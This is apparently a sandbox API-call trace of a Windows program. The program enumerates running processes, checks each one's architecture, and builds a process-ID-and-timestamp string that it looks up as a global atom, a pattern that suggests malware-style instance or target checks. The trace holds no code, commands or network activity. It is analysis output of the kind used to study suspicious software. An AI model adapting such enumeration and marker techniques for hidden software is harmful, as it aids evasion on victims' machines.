	[0072.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.761] CloseHandle (hObject=0x224) returned 1
	[0072.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728818, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.761] CloseHandle (hObject=0x224) returned 1
	[0072.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.761] CloseHandle (hObject=0x224) returned 1
	[0072.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.762] CloseHandle (hObject=0x224) returned 1
	[0072.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.762] CloseHandle (hObject=0x224) returned 1
	[0072.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.762] CloseHandle (hObject=0x224) returned 1
	[0072.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.762] CloseHandle (hObject=0x224) returned 1
	[0072.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.763] CloseHandle (hObject=0x224) returned 1
	[0072.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.763] CloseHandle (hObject=0x224) returned 1
	[0072.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.763] CloseHandle (hObject=0x224) returned 1
	[0072.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.763] CloseHandle (hObject=0x224) returned 1
	[0072.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.764] CloseHandle (hObject=0x224) returned 1
	[0072.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.764] CloseHandle (hObject=0x224) returned 1
	[0072.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.764] CloseHandle (hObject=0x224) returned 1
	[0072.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.764] CloseHandle (hObject=0x224) returned 1
	[0072.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.764] CloseHandle (hObject=0x224) returned 1
	[0072.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.765] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.765] CloseHandle (hObject=0x224) returned 1
	[0072.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.765] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.765] CloseHandle (hObject=0x224) returned 1
	[0072.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eab8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.765] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.765] CloseHandle (hObject=0x224) returned 1
	[0072.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.765] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.765] CloseHandle (hObject=0x224) returned 1
	[0072.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.766] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.766] CloseHandle (hObject=0x224) returned 1
	[0072.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7289f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.766] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.766] CloseHandle (hObject=0x224) returned 1
	[0072.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.766] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.766] CloseHandle (hObject=0x224) returned 1
	[0072.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.766] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.766] CloseHandle (hObject=0x224) returned 1
	[0072.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e888, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.766] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.766] CloseHandle (hObject=0x224) returned 1
	[0072.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e680, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.767] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.767] CloseHandle (hObject=0x224) returned 1
	[0072.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.767] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.768] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.768] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] GetLastError () returned 0x5
	[0072.768] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.769] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetLastError () returned 0x5
	[0072.770] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.770] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.770] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.770] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.770] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.770] CloseHandle (hObject=0x224) returned 1
	[0072.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.771] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.771] CloseHandle (hObject=0x224) returned 1
	[0072.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea90, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.771] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.771] CloseHandle (hObject=0x224) returned 1
	[0072.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0072.816] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772218, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
